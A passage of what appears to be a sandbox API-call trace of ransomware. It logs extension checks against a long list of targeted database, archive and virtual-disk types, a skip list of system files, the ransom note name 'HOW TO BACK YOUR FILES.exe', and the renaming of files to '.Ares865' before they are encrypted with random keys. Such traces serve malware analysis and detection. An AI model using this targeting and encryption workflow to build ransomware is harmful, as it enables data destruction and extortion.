lpString2="dbx") returned -1 [0085.151] lstrlenW (lpString="dcb") returned 3 [0085.151] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0085.151] lstrlenW (lpString="dct") returned 3 [0085.151] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0085.151] lstrlenW (lpString="dcx") returned 3 [0085.151] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0085.151] lstrlenW (lpString="ddl") returned 3 [0085.151] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0085.151] lstrlenW (lpString="dlis") returned 4 [0085.151] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0085.151] lstrlenW (lpString="dp1") returned 3 [0085.151] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0085.151] lstrlenW (lpString="dqy") returned 3 [0085.151] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0085.151] lstrlenW (lpString="dsk") returned 3 [0085.151] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0085.151] lstrlenW (lpString="dsn") returned 3 [0085.151] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0085.152] lstrlenW (lpString="dtsx") returned 4 [0085.152] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0085.152] lstrlenW (lpString="dxl") returned 3 [0085.152] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0085.152] lstrlenW (lpString="eco") returned 3 [0085.152] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0085.152] lstrlenW (lpString="ecx") returned 3 [0085.152] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0085.152] lstrlenW (lpString="edb") returned 3 [0085.152] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0085.152] lstrlenW (lpString="epim") returned 4 [0085.152] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0085.152] lstrlenW (lpString="fcd") returned 3 [0085.152] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0085.152] lstrlenW (lpString="fdb") returned 3 [0085.152] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0085.152] lstrlenW (lpString="fic") returned 3 [0085.152] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0085.152] lstrlenW (lpString="flexolibrary") returned 12 [0085.152] lstrcmpiW (lpString1="ertile31.bmp", lpString2="flexolibrary") returned -1 [0085.152] lstrlenW (lpString="fm5") returned 3 [0085.152] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0085.152] lstrlenW (lpString="fmp") returned 3 [0085.152] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0085.152] lstrlenW (lpString="fmp12") returned 5 [0085.152] lstrcmpiW (lpString1="1.bmp", lpString2="fmp12") returned -1 [0085.152] lstrlenW (lpString="fmpsl") returned 5 [0085.152] lstrcmpiW (lpString1="1.bmp", lpString2="fmpsl") returned -1 [0085.152] lstrlenW (lpString="fol") returned 3 [0085.152] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0085.152] lstrlenW (lpString="fp3") returned 3 [0085.152] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0085.152] lstrlenW (lpString="fp4") returned 3 [0085.152] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0085.152] lstrlenW (lpString="fp5") returned 3 [0085.152] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0085.152] lstrlenW (lpString="fp7") returned 3 [0085.153] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0085.153] lstrlenW (lpString="fpt") returned 3 [0085.153] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0085.153] lstrlenW (lpString="frm") returned 3 [0085.153] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0085.153] lstrlenW (lpString="gdb") returned 3 [0085.153] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.153] lstrlenW (lpString="gdb") returned 3 [0085.153] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.153] lstrlenW (lpString="grdb") returned 4 [0085.153] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0085.153] lstrlenW (lpString="gwi") returned 3 [0085.153] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0085.153] lstrlenW (lpString="hdb") returned 3 [0085.153] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0085.153] lstrlenW (lpString="his") returned 3 [0085.153] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0085.153] lstrlenW (lpString="ib") returned 2 [0085.153] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0085.153] lstrlenW (lpString="idb") returned 3 [0085.153] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0085.153] lstrlenW (lpString="ihx") returned 3 [0085.153] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0085.153] lstrlenW (lpString="itdb") returned 4 [0085.153] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0085.153] lstrlenW (lpString="itw") returned 3 [0085.153] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0085.153] lstrlenW (lpString="jet") returned 3 [0085.153] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0085.153] lstrlenW (lpString="jtx") returned 3 [0085.153] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0085.153] lstrlenW (lpString="kdb") returned 3 [0085.153] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0085.153] lstrlenW (lpString="kexi") returned 4 [0085.153] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0085.153] lstrlenW (lpString="kexic") returned 5 [0085.153] lstrcmpiW (lpString1="1.bmp", lpString2="kexic") returned -1 [0085.153] lstrlenW (lpString="kexis") returned 5 [0085.154] lstrcmpiW (lpString1="1.bmp", lpString2="kexis") returned -1 [0085.154] lstrlenW (lpString="lgc") returned 3 [0085.154] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0085.154] lstrlenW (lpString="lwx") returned 3 [0085.154] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0085.154] lstrlenW (lpString="maf") returned 3 [0085.154] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0085.154] lstrlenW (lpString="maq") returned 3 [0085.154] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0085.154] lstrlenW (lpString="mar") returned 3 [0085.154] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0085.154] lstrlenW (lpString="marshal") returned 7 [0085.154] lstrcmpiW (lpString1="e31.bmp", lpString2="marshal") returned -1 [0085.154] lstrlenW (lpString="mas") returned 3 [0085.154] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0085.154] lstrlenW (lpString="mav") returned 3 [0085.154] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0085.154] lstrlenW (lpString="maw") returned 3 [0085.154] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0085.154] lstrlenW (lpString="mdbhtml") returned 7 [0085.154] lstrcmpiW (lpString1="e31.bmp", lpString2="mdbhtml") returned -1 [0085.154] lstrlenW (lpString="mdn") returned 3 [0085.154] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0085.154] lstrlenW (lpString="mdt") returned 3 [0085.154] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0085.154] lstrlenW (lpString="mfd") returned 3 [0085.154] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0085.154] lstrlenW (lpString="mpd") returned 3 [0085.154] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0085.154] lstrlenW (lpString="mrg") returned 3 [0085.154] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0085.154] lstrlenW (lpString="mud") returned 3 [0085.154] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0085.154] lstrlenW (lpString="mwb") returned 3 [0085.154] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0085.154] lstrlenW (lpString="myd") returned 3 [0085.155] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0085.155] lstrlenW (lpString="ndf") returned 3 [0085.155] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0085.155] lstrlenW (lpString="nnt") returned 3 [0085.155] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0085.155] lstrlenW (lpString="nrmlib") returned 6 [0085.155] lstrcmpiW (lpString1="31.bmp", lpString2="nrmlib") returned -1 [0085.155] lstrlenW (lpString="ns2") returned 3 [0085.155] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0085.155] lstrlenW (lpString="ns3") returned 3 [0085.155] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0085.155] lstrlenW (lpString="ns4") returned 3 [0085.155] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0085.155] lstrlenW (lpString="nsf") returned 3 [0085.155] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0085.155] lstrlenW (lpString="nv") returned 2 [0085.155] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0085.155] lstrlenW (lpString="nv2") returned 3 [0085.155] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0085.155] lstrlenW (lpString="nwdb") returned 4 [0085.155] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0085.155] lstrlenW (lpString="nyf") returned 3 [0085.155] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0085.155] lstrlenW (lpString="odb") returned 3 [0085.155] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.155] lstrlenW (lpString="odb") returned 3 [0085.155] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.155] lstrlenW (lpString="oqy") returned 3 [0085.155] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0085.155] lstrlenW (lpString="ora") returned 3 [0085.155] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0085.155] lstrlenW (lpString="orx") returned 3 [0085.155] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0085.155] lstrlenW (lpString="owc") returned 3 [0085.155] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0085.155] lstrlenW (lpString="p96") returned 3 [0085.155] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0085.156] lstrlenW (lpString="p97") returned 3 [0085.156] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0085.156] lstrlenW (lpString="pan") returned 3 [0085.156] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0085.156] lstrlenW (lpString="pdb") returned 3 [0085.156] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0085.156] lstrlenW (lpString="pdm") returned 3 [0085.156] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0085.156] lstrlenW (lpString="pnz") returned 3 [0085.156] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0085.156] lstrlenW (lpString="qry") returned 3 [0085.156] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0085.156] lstrlenW (lpString="qvd") returned 3 [0085.156] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0085.156] lstrlenW (lpString="rbf") returned 3 [0085.156] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0085.156] lstrlenW (lpString="rctd") returned 4 [0085.156] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0085.156] lstrlenW (lpString="rod") returned 3 [0085.156] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0085.156] lstrlenW (lpString="rodx") returned 4 [0085.156] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0085.156] lstrlenW (lpString="rpd") returned 3 [0085.156] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0085.156] lstrlenW (lpString="rsd") returned 3 [0085.156] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0085.156] lstrlenW (lpString="sas7bdat") returned 8 [0085.156] lstrcmpiW (lpString1="le31.bmp", lpString2="sas7bdat") returned -1 [0085.156] lstrlenW (lpString="sbf") returned 3 [0085.156] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0085.156] lstrlenW (lpString="scx") returned 3 [0085.156] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0085.156] lstrlenW (lpString="sdb") returned 3 [0085.156] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0085.156] lstrlenW (lpString="sdc") returned 3 [0085.156] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0085.156] lstrlenW (lpString="sdf") returned 3 [0085.157] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0085.157] lstrlenW (lpString="sis") returned 3 [0085.157] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0085.157] lstrlenW (lpString="spq") returned 3 [0085.157] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0085.157] lstrlenW (lpString="te") returned 2 [0085.157] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0085.157] lstrlenW (lpString="teacher") returned 7 [0085.157] lstrcmpiW (lpString1="e31.bmp", lpString2="teacher") returned -1 [0085.157] lstrlenW (lpString="tmd") returned 3 [0085.157] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0085.157] lstrlenW (lpString="tps") returned 3 [0085.157] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0085.157] lstrlenW (lpString="trc") returned 3 [0085.157] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.157] lstrlenW (lpString="trc") returned 3 [0085.157] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.157] lstrlenW (lpString="trm") returned 3 [0085.157] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0085.157] lstrlenW (lpString="udb") returned 3 [0085.157] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0085.157] lstrlenW (lpString="udl") returned 3 [0085.157] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0085.157] lstrlenW (lpString="usr") returned 3 [0085.157] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0085.157] lstrlenW (lpString="v12") returned 3 [0085.157] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0085.157] lstrlenW (lpString="vis") returned 3 [0085.157] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0085.157] lstrlenW (lpString="vpd") returned 3 [0085.157] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0085.157] lstrlenW (lpString="vvv") returned 3 [0085.157] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0085.157] lstrlenW (lpString="wdb") returned 3 [0085.157] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0085.157] lstrlenW (lpString="wmdb") returned 4 [0085.157] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0085.157] lstrlenW (lpString="wrk") returned 3 [0085.158] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0085.158] lstrlenW (lpString="xdb") returned 3 [0085.158] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0085.158] lstrlenW (lpString="xld") returned 3 [0085.158] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0085.158] lstrlenW (lpString="xmlff") returned 5 [0085.158] lstrcmpiW (lpString1="1.bmp", lpString2="xmlff") returned -1 [0085.158] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp.Ares865") returned 90 [0085.158] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile31.bmp.ares865"), dwFlags=0x1) returned 1 [0085.162] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile31.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.163] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0085.163] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.163] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.163] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0085.163] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0085.164] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.164] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.164] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0085.165] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0085.168] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0085.169] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.169] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0085.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0085.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.169] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.170] CloseHandle (hObject=0x15c) returned 1 [0085.170] CloseHandle (hObject=0x118) returned 1 [0085.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0085.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.171] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae48a8e7, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae48a8e7, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd42216d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile32.bmp", cAlternateFileName="")) returned 1 [0085.171] lstrcmpiW (lpString1="usertile32.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.171] lstrcmpiW (lpString1="usertile32.bmp", lpString2="aoldtz.exe") returned 1 [0085.171] lstrcmpiW (lpString1="usertile32.bmp", lpString2=".") returned 1 [0085.171] lstrcmpiW (lpString1="usertile32.bmp", lpString2="..") returned 1 [0085.171] lstrcmpiW (lpString1="usertile32.bmp", lpString2="windows") returned -1 [0085.171] lstrcmpiW (lpString1="usertile32.bmp", lpString2="bootmgr") returned 1 [0085.171] lstrcmpiW (lpString1="usertile32.bmp", lpString2="temp") returned 1 [0085.171] lstrcmpiW (lpString1="usertile32.bmp", lpString2="pagefile.sys") returned 1 [0085.171] lstrcmpiW (lpString1="usertile32.bmp", lpString2="boot") returned 1 [0085.171] lstrcmpiW (lpString1="usertile32.bmp", lpString2="ids.txt") returned 1 [0085.171] lstrcmpiW (lpString1="usertile32.bmp", lpString2="ntuser.dat") returned 1 [0085.171] lstrcmpiW (lpString1="usertile32.bmp", lpString2="perflogs") returned 1 [0085.171] lstrcmpiW (lpString1="usertile32.bmp", lpString2="MSBuild") returned 1 [0085.171] lstrlenW (lpString="usertile32.bmp") returned 14 [0085.171] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp") returned 82 [0085.171] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile32.bmp" | out: lpString1="usertile32.bmp") returned="usertile32.bmp" [0085.171] lstrlenW (lpString="usertile32.bmp") returned 14 [0085.171] lstrlenW (lpString="Ares865") returned 7 [0085.171] lstrcmpiW (lpString1="e32.bmp", lpString2="Ares865") returned 1 [0085.171] lstrlenW (lpString=".dll") returned 4 [0085.171] lstrcmpiW (lpString1="usertile32.bmp", lpString2=".dll") returned 1 [0085.171] lstrlenW (lpString=".lnk") returned 4 [0085.171] lstrcmpiW (lpString1="usertile32.bmp", lpString2=".lnk") returned 1 [0085.171] lstrlenW (lpString=".ini") returned 4 [0085.171] lstrcmpiW (lpString1="usertile32.bmp", lpString2=".ini") returned 1 [0085.171] lstrlenW (lpString=".sys") returned 4 [0085.171] lstrcmpiW (lpString1="usertile32.bmp", lpString2=".sys") returned 1 [0085.171] lstrlenW (lpString="usertile32.bmp") returned 14 [0085.171] lstrlenW (lpString="bak") returned 3 [0085.171] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0085.171] lstrlenW (lpString="ba_") returned 3 [0085.171] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0085.172] lstrlenW (lpString="dbb") returned 3 [0085.172] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0085.172] lstrlenW (lpString="vmdk") returned 4 [0085.172] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0085.172] lstrlenW (lpString="rar") returned 3 [0085.172] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0085.172] lstrlenW (lpString="zip") returned 3 [0085.172] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0085.172] lstrlenW (lpString="tgz") returned 3 [0085.172] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0085.172] lstrlenW (lpString="vbox") returned 4 [0085.172] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0085.172] lstrlenW (lpString="vdi") returned 3 [0085.172] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0085.172] lstrlenW (lpString="vhd") returned 3 [0085.172] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0085.172] lstrlenW (lpString="vhdx") returned 4 [0085.172] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0085.172] lstrlenW (lpString="avhd") returned 4 [0085.172] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0085.172] lstrlenW (lpString="db") returned 2 [0085.172] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0085.172] lstrlenW (lpString="db2") returned 3 [0085.172] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0085.172] lstrlenW (lpString="db3") returned 3 [0085.172] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0085.172] lstrlenW (lpString="dbf") returned 3 [0085.172] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0085.172] lstrlenW (lpString="mdf") returned 3 [0085.172] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0085.172] lstrlenW (lpString="mdb") returned 3 [0085.172] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0085.172] lstrlenW (lpString="sql") returned 3 [0085.172] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0085.172] lstrlenW (lpString="sqlite") returned 6 [0085.172] lstrcmpiW (lpString1="32.bmp", lpString2="sqlite") returned -1 [0085.172] lstrlenW (lpString="sqlite3") returned 7 [0085.172] lstrcmpiW (lpString1="e32.bmp", lpString2="sqlite3") returned -1 [0085.173] lstrlenW (lpString="sqlitedb") returned 8 [0085.173] lstrcmpiW (lpString1="le32.bmp", lpString2="sqlitedb") returned -1 [0085.173] lstrlenW (lpString="xml") returned 3 [0085.173] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0085.173] lstrlenW (lpString="$er") returned 3 [0085.173] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0085.173] lstrlenW (lpString="4dd") returned 3 [0085.173] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0085.173] lstrlenW (lpString="4dl") returned 3 [0085.173] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0085.173] lstrlenW (lpString="^^^") returned 3 [0085.173] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0085.173] lstrlenW (lpString="abs") returned 3 [0085.173] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0085.173] lstrlenW (lpString="abx") returned 3 [0085.173] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0085.173] lstrlenW (lpString="accdb") returned 5 [0085.173] lstrcmpiW (lpString1="2.bmp", lpString2="accdb") returned -1 [0085.173] lstrlenW (lpString="accdc") returned 5 [0085.173] lstrcmpiW (lpString1="2.bmp", lpString2="accdc") returned -1 [0085.173] lstrlenW (lpString="accde") returned 5 [0085.173] lstrcmpiW (lpString1="2.bmp", lpString2="accde") returned -1 [0085.173] lstrlenW (lpString="accdr") returned 5 [0085.173] lstrcmpiW (lpString1="2.bmp", lpString2="accdr") returned -1 [0085.173] lstrlenW (lpString="accdt") returned 5 [0085.173] lstrcmpiW (lpString1="2.bmp", lpString2="accdt") returned -1 [0085.173] lstrlenW (lpString="accdw") returned 5 [0085.173] lstrcmpiW (lpString1="2.bmp", lpString2="accdw") returned -1 [0085.173] lstrlenW (lpString="accft") returned 5 [0085.173] lstrcmpiW (lpString1="2.bmp", lpString2="accft") returned -1 [0085.173] lstrlenW (lpString="adb") returned 3 [0085.173] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.173] lstrlenW (lpString="adb") returned 3 [0085.173] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.173] lstrlenW (lpString="ade") returned 3 [0085.173] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0085.173] lstrlenW (lpString="adf") returned 3 [0085.174] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0085.174] lstrlenW (lpString="adn") returned 3 [0085.174] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0085.174] lstrlenW (lpString="adp") returned 3 [0085.174] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0085.174] lstrlenW (lpString="alf") returned 3 [0085.174] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0085.174] lstrlenW (lpString="ask") returned 3 [0085.174] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0085.174] lstrlenW (lpString="btr") returned 3 [0085.174] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0085.174] lstrlenW (lpString="cat") returned 3 [0085.174] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0085.174] lstrlenW (lpString="cdb") returned 3 [0085.174] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0085.174] lstrlenW (lpString="ckp") returned 3 [0085.174] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0085.174] lstrlenW (lpString="cma") returned 3 [0085.174] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0085.174] lstrlenW (lpString="cpd") returned 3 [0085.174] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0085.174] lstrlenW (lpString="dacpac") returned 6 [0085.174] 